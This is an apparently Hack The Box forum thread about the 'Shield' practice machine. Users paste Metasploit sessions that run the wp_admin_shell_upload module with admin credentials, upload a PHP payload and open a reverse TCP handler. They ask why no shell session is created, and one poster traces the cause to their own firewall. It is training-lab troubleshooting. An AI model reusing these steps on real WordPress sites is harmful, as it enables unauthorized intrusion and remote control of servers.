Starting Point Shield

HTB Content Machines
1

Hey all,

  After I set all my options, which i've tripple checked i get the following

msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.18:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php…
[!] This exploit may require manual cleanup of ‘CXffIyrlNi.php’ on the target
[!] This exploit may require manual cleanup of ‘isEHXJHygE.php’ on the target
[!] This exploit may require manual cleanup of ‘…/isEHXJHygE’ on the target
[] Exploit completed, but no session was created.

am I doing something wrong? Please help

2

Type your comment> @R4ZZB33RY said:

Hey all,

  After I set all my options, which i've tripple checked i get the following

msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.18:4444
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php…
[!] This exploit may require manual cleanup of ‘CXffIyrlNi.php’ on the target
[!] This exploit may require manual cleanup of ‘isEHXJHygE.php’ on the target
[!] This exploit may require manual cleanup of ‘…/isEHXJHygE’ on the target
[] Exploit completed, but no session was created.

am I doing something wrong? Please help

I figured it out folks! It was my firewall.

3

I’m having similar issues on Kali. Web UI works with same user/pass. Any ideas?

       =[ metasploit v5.0.93-dev                          ]
+ -- --=[ 2029 exploits - 1103 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password P@s5w0rd!
password => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 10.10.10.29
rhosts => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress
targeturi => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[-] Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.